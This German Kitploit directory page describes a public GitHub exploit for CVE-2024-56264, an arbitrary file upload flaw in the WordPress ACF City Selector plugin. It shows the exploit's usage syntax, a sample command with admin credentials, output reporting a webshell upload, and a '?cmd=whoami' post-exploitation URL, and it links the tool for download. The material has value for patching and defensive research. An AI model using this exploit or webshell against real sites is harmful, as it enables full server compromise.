Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-56264 — WordPress ACF City Selector plugin <= 1.14.0 - Schwachstelle für beliebigen Datei-Upload | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-56264
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2024-56264

CVE-2024-56264

WordPress ACF City Selector plugin <= 1.14.0 - Schwachstelle für beliebigen Datei-Upload

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-56264

WordPress ACF City Selector - Exploit für beliebigen Dateiupload (CVE-2024-56264)

Überblick

Dieses Repository enthält einen Exploit für CVE-2024-56264, eine Schwachstelle für beliebigen Dateiupload im WordPress-Plugin ACF City Selector (Versionen <= 1.14.0). Diese Schwachstelle ermöglicht es einem Angreifer, eine bösartige PHP-Datei (Webshell) auf eine verwundbare WordPress-Instanz hochzuladen und beliebige Befehle auf dem Server auszuführen.

CVE-Details

  • CVE ID: CVE-2024-56264
  • Veröffentlichungsdatum: 2. Januar 2025
  • Betroffenes Plugin: ACF City Selector
  • Verwundbare Versionen: <= 1.14.0
  • Auswirkung: Remote Code Execution (RCE) durch uneingeschränkten Dateiupload

Beschreibung

Das Plugin ACF City Selector validiert hochgeladene Dateien nicht ordnungsgemäß, sodass Angreifer und hochladen können. Sobald eine bösartige PHP-Datei hochgeladen wurde, kann ein Angreifer aus der Ferne Systembefehle ausführen, was zu einer führt.

Einschränkungen umgehen
beliebige PHP-Dateien
vollständigen Serverkompromittierung

Anforderungen

📌 Abhängigkeiten

Stellen Sie sicher, dass Folgendes installiert ist, bevor Sie das Skript ausführen:

  • Python 3.x
  • Modul requests (Installation mit: pip install requests)

Sie können alle erforderlichen Abhängigkeiten installieren mit:

root@kitploit:~
pip install -r requirements.txt

🚀 Verwendung

Ausführen des Exploits:

root@kitploit:~
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector Plugin <= 1.14.0 - Schwachstelle für beliebigen Dateiupload

options:
  -h, --help           zeigt diese Hilfemeldung an und beendet das Programm
  --url URL            Basis-URL der Website (z. B. http://192.168.100.74/wordpress)
  --username USERNAME  WordPress-Benutzername
  --password PASSWORD  WordPress-Passwort

Beispiel:

root@kitploit:~
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

Erwartete Ausgabe

Bei erfolgreicher Ausnutzung sollten Sie Folgendes sehen:

root@kitploit:~
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php

Post-Exploitation

Bei Erfolg greifen Sie auf die hochgeladene Shell zu über:

root@kitploit:~
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

Dies ermöglicht die Remote-Ausführung von Befehlen auf dem Server.

⚠ Haftungsausschluss

Dieses Skript ist nur für Bildungszwecke und autorisierte Sicherheitstests bestimmt. Unbefugte Nutzung ist illegal und kann schwerwiegende Konsequenzen haben. Der Autor übernimmt keine Verantwortung für den Missbrauch dieses Exploits.

Tool herunterladen